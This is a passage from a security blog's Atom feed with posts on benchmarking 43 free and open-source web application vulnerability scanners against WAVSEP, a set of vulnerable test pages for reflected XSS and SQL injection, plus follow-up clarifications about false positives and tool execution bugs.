conclusions &lt;b&gt;will &lt;/b&gt;change as soon as the next benchmark is released; I know for a fact that some vendors invested so much effort in improving their detection modules that some of the new versions get to nearly 100% detection ratio (but since I don’t have updated statistics, well have to wait).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;Conclusions&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;So… it seems that I didn&#39;t find “the best web application vulnerability scanner” after all… but I did find combinations of open source &amp;amp; freeware tools that get pretty good results.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;As I mentioned in previous posts, my work is only beginning.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Various open source vendors already released new versions that should be tested, tools that were improperly executed (or had a bug) should be retested as soon as their issues are mitigated, additional research led me to discover a couple of additional open source web application scanner projects, and at least one new open source web application scanner was released in the last couple of weeks (and I haven’t even mentioned commercial scanners).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Time to get back to work… &lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7571530788987583648/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2011/01/myth-breaker-best-open-source-web.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7571530788987583648'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7571530788987583648'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2011/01/myth-breaker-best-open-source-web.html' title='Myth Breaker - The Best Open Source Web Application Vulnerability Scanner'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7552689011395458988</id><published>2011-01-11T14:51:00.000-08:00</published><updated>2011-01-11T14:57:37.245-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="clarification"/><category scheme="http://www.blogger.com/atom/ns#" term="followup"/><title type='text'>Follow Up &amp; Clarifications</title><content type='html'>&lt;p class=&quot;MsoNormal&quot;&gt;I’ve been pretty busy trying to contact the various vendors and deliver materials that they can use for QA &amp;amp; development, and I must mention that so far every vendor / developer that I have contacted responded kindly, and many of them responded with excitement and already started enhancing their tool (which is GREAT news for all of us).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;I managed to find the time to contact about 18 vendors, and hopefully I’ll manage to contact more in the following weeks (25 left to go). This process requires me to analyze the benefits of the tools of each vendor, and as a result, is more time consuming then I originally thought; however, thanks to this process, I believe that soon it will lead me to some additional interesting conclusions and insights, which I’ll publish separately.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;In the process of contacting the vendors, I realized that I have neglected some of my duties and forgot to publish some &lt;b&gt;important clarifications&lt;/b&gt;:&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Although the test cases implemented as “False Positives” are by no means vulnerable to SQL Injection or Cross Site Scripting, some of the test cases still fall into a category of information that should be presented in the report under the context of another type of exposure:&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;!--[if !supportLists]--&gt;&lt;p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left:1.0in;mso-add-space: auto;text-indent:-.25in;mso-list:l0 level2 lfo1&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family:&amp;quot;Courier New&amp;quot;;mso-fareast-font-family:&amp;quot;Courier New&amp;quot;&quot;&gt;&lt;span style=&quot;mso-list:Ignore&quot;&gt;o&lt;span style=&quot;font:7.0pt &amp;quot;Times New Roman&amp;quot;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Pages that disclose sensitive information / exceptions (some SQL Injection False Positive test cases that are meant to simulate SQL errors that do not derive from user originating input, such as connection failures, etc).&lt;/p&gt;  &lt;p class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left:1.0in;mso-add-space: auto;text-indent:-.25in;mso-list:l0 level2 lfo1&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family:&amp;quot;Courier New&amp;quot;;mso-fareast-font-family:&amp;quot;Courier New&amp;quot;&quot;&gt;&lt;span style=&quot;mso-list:Ignore&quot;&gt;o&lt;span style=&quot;font:7.0pt &amp;quot;Times New Roman&amp;quot;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Pages that fall under the category of insecure coding practices (some of the False RXSS &amp;amp; SQLi pages).&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Some tools are still in early beta, and some didn’t even publish an official alpha version (aidSQL, iScan, and some of the other tools that had zero accuracy); the accuracy of these tools was not really audited, due to limitations or bugs that will surely be mitigated in the future versions. The benchmark will be updated as soon as the tool vendors release a new stable version.&lt;/li&gt;&lt;li&gt;The execution of certain tools which were reported as having zero accuracy failed due to bugs or configuration flaws, and not accuracy related issues; These tools include SQLMap, aidSQL, VulnDetector, and a couple of more; I’m currently working with the various vendors to figure out how to execute them properly (or how to work around the specific bugs), so the test will actually reflect their accuracy level.&lt;/li&gt;&lt;/ul&gt;&lt;!--[if !supportLists]--&gt;&lt;p&gt;&lt;/p&gt;    &lt;p class=&quot;MsoNormal&quot;&gt;As a result, I believe that the next benchmark is going to be performed sooner then I planned;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;It will probably include the same results alongside the corrected scans of the tools that had execution issues (particularly SQL tools), and maybe additional enhancements (under discussion).&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;I wish you all a Happy New Year :)&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7552689011395458988/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2011/01/follow-up-clarifications.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7552689011395458988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7552689011395458988'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2011/01/follow-up-clarifications.html' title='Follow Up &amp; Clarifications'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7398976696397938525</id><published>2010-12-26T03:26:00.000-08:00</published><updated>2011-07-07T05:37:10.879-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="benchmark"/><category scheme="http://www.blogger.com/atom/ns#" term="benchmarking"/><category scheme="http://www.blogger.com/atom/ns#" term="scanner"/><category scheme="http://www.blogger.com/atom/ns#" term="security benchmark"/><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability scanner"/><category scheme="http://www.blogger.com/atom/ns#" term="vulnerable application"/><category scheme="http://www.blogger.com/atom/ns#" term="web application scanner"/><title type='text'>Web Application Scanner Benchmark (v1.0)</title><content type='html'>&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Well, it’s finally done. What I originally thought will only take me a couple of days, and found myself doing for the past 9 months is finally ready for release, and it’s titled:&lt;/div&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 44pt; line-height: 115%;&quot;&gt;Web Application Scanners Accuracy Assessment&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 30pt; line-height: 115%;&quot;&gt;Freeware &amp;amp; Open Source Scanners&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Comparison &amp;amp; Assessment of &lt;b&gt;43&lt;/b&gt; Free &amp;amp; Open Source Black Box Web Application Vulnerability Scanners&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;By Shay Chen&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Information Security Consultant, Researcher and Instructor&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict.blogspot.com/&quot;&gt;http://sectooladdict.blogspot.com/&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;sectooladdict -$at$- gmail -$dot$- com&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;December 2010&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Assessment Environment:&lt;/i&gt;&lt;/b&gt; WAVSEP 1.0 (&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;-webkit-text-decorations-in-effect: none; font-size: small; font-weight: normal; line-height: normal;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #999999; font-size: 18pt; line-height: 27px;&quot;&gt;Introduction&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I’ve been collecting them for years, trying to get my hands on anything that was released within the genre.  It started as a necessity, transformed into a hobby, and eventually turned into a relatively huge collection… But that’s when the problems started.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;While back in 2005 I could barely find freeware web application scanners, by 2008 I had SO MANY of them that I couldn’t decide which ones to use. By 2010 the collection became so big that I came to the realization that I HAVE to choose.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I started searching for benchmarks in the field, but at the time, only located benchmarks the focused on comparing commercial web application scanners (with the exception of one benchmark that also covered 3 open source web application scanners), leaving the freeware &amp;amp; open source scanners in an uncharted territory;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.virtualforge.de/index.php/en/library/white-papers/web-application-vulnerability-scanners-a-benchmark_en.html&quot;&gt;http://www.virtualforge.de/index.php/en/library/white-papers/web-application-vulnerability-scanners-a-benchmark_en.html&lt;/a&gt; (Anonymous scanners)&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://anantasec.blogspot.com/2009/01/web-vulnerability-scanners-comparison.html&quot;&gt;http://anantasec.blogspot.com/2009/01/web-vulnerability-scanners-comparison.html&lt;/a&gt; (commercial scanners)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf&quot;&gt;http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf&lt;/a&gt; (mostly commercial, but including W3AF, paros and grendel-scan)&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://ha.ckers.org/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf&quot;&gt;http://ha.ckers.org/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf&lt;/a&gt; (commercial scanners)&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;By 2010 I had over 50 tools, so I eventually decided to test them myself using the same model used in previous benchmarks (&lt;b&gt;a big BIG mistake&lt;/b&gt;).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I initially tested the various tools against a vulnerable ASP.net web application and came to conclusions as to which tool is the “best”… and if it weren’t for my curiosity, that probably would have been the end of it and my conclusions might have mislead many more.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I decided to test the tools against another vulnerable web application, just to make sure the results were consistent, and arbitrarily selected “&lt;b&gt;Insecure Web App&lt;/b&gt;” (a vulnerable JEE web application) as the second target… and to my surprise, the results of the tests against it were VERY different.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Some of the Tools that were efficient in the test against the vulnerable ASP.net application (which will stay anonymous for the time being) didn’t function very well and missed many exposures, while some of the tools that I previously classified as “useless” detected exposures that NONE of the other tools found.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;After performing an in-depth analysis for the different vulnerabilities in the tested applications, I came to the conclusion that although the applications included a similar classification of exposures (SQL Injection, RXSS, Information disclosure, etc), the properties and restrictions in the exposure instances were VERY different in each application.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;That’s when it dawned on me that the different methods that tools use to discover security exposures might be efficient for detecting certain common instances of a vulnerability while simultaneously being inefficient for detecting other instances of the same vulnerability, and that tools with “lesser” algorithms or different approaches (which might appear to be less effective at first) might be able to fill the gap.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So the question remains… Which tool is the best? Is there one that surpasses the others? Can there be only one?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I decided to find out…&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It started as a bunch of test cases, and ended as a project containing hundreds of scenarios (currently focusing on Reflected XSS and SQL Injection) that will hopefully help in unveiling the mystery.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;(A PDF version of this benchmark will be available shortly in the WAVSEP project home page at &lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #999999; font-size: 18pt; line-height: 115%;&quot;&gt;Thank-You Note&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Before I’ll describe project WAVSEP and the results of the first scanner benchmark performed using it, I’d like to thank all the tool developers and vendors that shared freeware &amp;amp; open source tools with the community over the years; if it weren’t for the long hours they’ve invested and the generosity they had to share their creations, then my job (and that of others in my profession) would have been much harder.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I’d like to express my sincere gratitude for Shimi Volkovich (&lt;a href=&quot;http://il.linkedin.com/pub/shimi-volkovich/20/173/263&quot;&gt;http://il.linkedin.com/pub/shimi-volkovich/20/173/263&lt;/a&gt;), for taking the time to design the logo I’ll soon be using.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I would also like to thank all the sources that helped me gather the list of scanners over the years, including (but not limited to) information security sources such as &lt;b&gt;PenTestIT&lt;/b&gt; (&lt;a href=&quot;http://www.pentestit.com/&quot;&gt;http://www.pentestit.com/&lt;/a&gt;), &lt;b&gt;Security Sh3ll&lt;/b&gt; (&lt;a href=&quot;http://security-sh3ll.blogspot.com/&quot;&gt;http://security-sh3ll.blogspot.com/&lt;/a&gt;), &lt;b&gt;Security Database&lt;/b&gt; (&lt;a href=&quot;http://www.security-database.com/&quot;&gt;http://www.security-database.com/&lt;/a&gt;), &lt;b&gt;Darknet&lt;/b&gt; (&lt;a href=&quot;http://www.darknet.org.uk/&quot;&gt;http://www.darknet.org.uk/&lt;/a&gt;), &lt;b&gt;Packet Storm&lt;/b&gt; (&lt;a href=&quot;http://packetstormsecurity.org/&quot;&gt;http://packetstormsecurity.org/&lt;/a&gt;), &lt;b&gt;Help Net Security&lt;/b&gt; (&lt;a href=&quot;http://www.net-security.org/&quot;&gt;http://www.net-security.org/&lt;/a&gt;), &lt;b&gt;Astalavista&lt;/b&gt; (&lt;a href=&quot;http://www.astalavista.com/&quot;&gt;http://www.astalavista.com/&lt;/a&gt;), &lt;b&gt;Google&lt;/b&gt; (of course) and many others that I have neglected to mention due to my failing memory.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I hope that the conclusions, ideas, information and payloads presented in this research (and the benchmarks and tools that will follow) will benefit all vendors, and specifically help the open source community to locate code sections that all tool vendors could assimilate to improve their products; to that end I’ll try and contact each vendor in the next few weeks, in order to notify them on source codes that could be assimilated in their product to make it even better (on the basis of development technology and the license of each code section).&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #999999; font-size: 18pt; line-height: 115%;&quot;&gt;Phase I – The “Traditional” Benchmark&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Testing the scanners against vulnerable training &amp;amp; real life applications.&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As I mentioned earlier, In the initial phase of the benchmark, I have tested the various scanners in front of different vulnerable “training” applications (&lt;b&gt;&lt;i&gt;OWASP InsecureWebApp&lt;/i&gt;&lt;/b&gt;, &lt;b&gt;&lt;i&gt;a vulnerable .Net Application&lt;/i&gt;&lt;/b&gt; and a simple vulnerable application I have written myself), and tested many of them against real life applications (ASP.Net applications, Java applications based on Spring, Web application written in PHP, etc). &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I decided not to publish the results just yet, and for a damn good reason which I did not predict in the first place; nevertheless, the initial process was &lt;b&gt;&lt;u&gt;very&lt;/u&gt;&lt;/b&gt; helpful because it helped me to learn about the different aspects of the tools: &lt;b&gt;features&lt;/b&gt;, &lt;b&gt;vulnerability list&lt;/b&gt;, &lt;b&gt;coverage&lt;/b&gt;, &lt;b&gt;installation processes&lt;/b&gt;, &lt;b&gt;configuration methods&lt;/b&gt;, &lt;b&gt;usage&lt;/b&gt;, &lt;b&gt;adaptability&lt;/b&gt;, &lt;b&gt;stability&lt;/b&gt;, &lt;b&gt;performance&lt;/b&gt; and a bunch of other aspects.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I have found &lt;b&gt;VERY&lt;/b&gt; interesting results that prove that certain old scanners might provide great benefits in many cases that many modern projects will &lt;b&gt;not&lt;/b&gt; handle properly.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The process also enabled me to &lt;b&gt;&lt;u&gt;verify&lt;/u&gt;&lt;/b&gt; the support of the various tools in their proclaimed features (which I have literally done for the vast majority of the tools, using proxies, sniffers and other experiments), and even get a general measure of their accuracy and capabilities.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;However, after seeing the results diversity in different applications and technologies, and after dealing with the countless challenges that came along the way, I have discovered several limitations and even a &lt;b&gt;fundamental flaw&lt;/b&gt; in testing the accuracy, coverage, stability and performance of scanners in this manner (I have managed to test around 50 free and open source scanners by this point, as insane and unbelievable as this number might sound);&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;We may be able to estimate the general capabilities of a scanner from the amount of REAL exposures that it located, the amount of exposures that it missed (false negatives) and from the amount of FALSE exposures (false positives) it identified as security exposures, BUT on the other hand, the output of such a process will very much depend on the type of exposures that exist in the tested application, how much each scanner is adapted to the tested application technology and which private cases of exposures and barriers exist in the tested application.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;A scanner that will be very useful for scanning PHP web sites might completely fail the task of scanning a ASP.Net web application, and a tool perfectly suited for that task might crash when faced with certain application behaviors, or be useless in detecting a private case of a specific vulnerability that is not supported by the tool.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I guess what I’m trying to say is this:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;There are &lt;b&gt;many forms&lt;/b&gt; and variations to each security exposure, and in order to prove my point, I’ll use the example of reflected cross site scripting;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Locations vulnerable to reflected cross site scripting might appear in many forms; they may require the attacker to send a whole HTML tag as a part of the crafted link, require the injection of an HTML event (in case the input-affected-output is printed in the context of a tag and the usage of tag-composing-characters is restricted), they may appear in locations vulnerable to SQL injection (and thus restrict the use of certain characters, or even require the usage of initial payloads that “disable” the SQL injection vulnerability first), require browser specific payloads or even direct injection of javascript/vbscript (in case the context is within a script tag, certain HTML events or even in the context of certain properties), and these cases are only a fragment of the whole list!&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So, how can the tester know which of these cases is handled by each scanner from the figures and numbers presented in a general benchmark?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I believe he &lt;b&gt;can’t&lt;/b&gt;. No matter how solid the difference appears, he really &lt;b&gt;can’t&lt;/b&gt;.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Such information may allow him to root out useless tools (tools that miss even the most obvious exposures), and even identify what appears to be a significant difference in the accuracy of locating certain exposure instances, but the latter case might have been very different if the tested applications would have been prone to certain exposure instances that are the specialty of a different scanner, or would have included a technological barrier that requires a specific feature or behavior to bypass.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Thus, I have come to believe that the only way I could truly provide useful information to testers on the accuracy and coverage of freely available web application scanners is by writing detailed test cases for different exposures, starting with some core common exposures such as SQL Injection, cross site scripting and maybe a couple of others.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;And thus, I have ended up investing countless nights in the development of a new test-case based evaluation application, designed specifically to test the support of each tool for detecting MANY different cases of certain common exposures.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the original benchmark (against the vulnerable training web applications) will be published separately in a different article (since by now, many of them have been updated, and the results require modifications).&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #999999; font-size: 18pt; line-height: 115%;&quot;&gt;Phase II - Project WAVSEP&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;After documenting and testing the features of every free &amp;amp; open source web application scanner and scan script that I could get my hands on, I discovered that the most common features were &lt;b&gt;Reflected Cross Site Scripting (RXSS)&lt;/b&gt; and &lt;b&gt;SQL Injection (SQLi)&lt;/b&gt;. I decided to focus my initial efforts on these two vulnerabilities, and develop a platform that could truly evaluate how good each scanner is in &lt;b&gt;detecting&lt;/b&gt; them, which tool combinations provide the best results and which tool can bypass the largest amount of detection barriers.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Project &lt;b&gt;WAVSEP&lt;/b&gt; (&lt;b&gt;Web Application Vulnerability Scanner Evaluation Project&lt;/b&gt;) was implemented as a set of vulnerable JSP pages; each page implementing a unique test case.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;A test case is defined as a unique combination of the following elements:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l2 level1 lfo2; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;A certain instance of a given vulnerability.&lt;/li&gt;
&lt;li&gt;Attack vectors with certain input origins (either GET or POST values, and in the future, also URL/path, cookie, various headers, file upload content and other origins).&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Currently, only GET and POST attack vectors are covered, since most scanners support only GET and POST vectors (future versions of WAVSEP will include support for additional databases, additional response types, additional detection barriers, additional attack vector origins and additional vulnerabilities).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Project WAVSEP currently consists of the following test cases:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;6&lt;/span&gt;4 Reflected XSS test cases (32 GET cases, 32 POST cases -&amp;gt; &lt;b&gt;66&lt;/b&gt; total vulnerabilities)&lt;/li&gt;
&lt;li&gt;130 SQL Injection test cases, most of them implemented for MySQL &amp;amp; MSSQL (65 GET cases, 65 POST Vases -&amp;gt; &lt;b&gt;136&lt;/b&gt; total vulnerabilities)&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l8 level2 lfo3; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;The list of test cases includes vulnerable pages that respond with 500 HTTP errors, 200 HTTP Responses with erroneous text, 200 HTTP Responses with differentiation or completely identical 200 HTTP responses. &lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l8 level2 lfo3; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;80 out of 136 cases are simple SQL injection test cases (500 &amp;amp; 200 erroneous HTTP responses), and 56 are Blind SQL Injection test cases (valid and identical 200 HTTP responses).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo3; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New 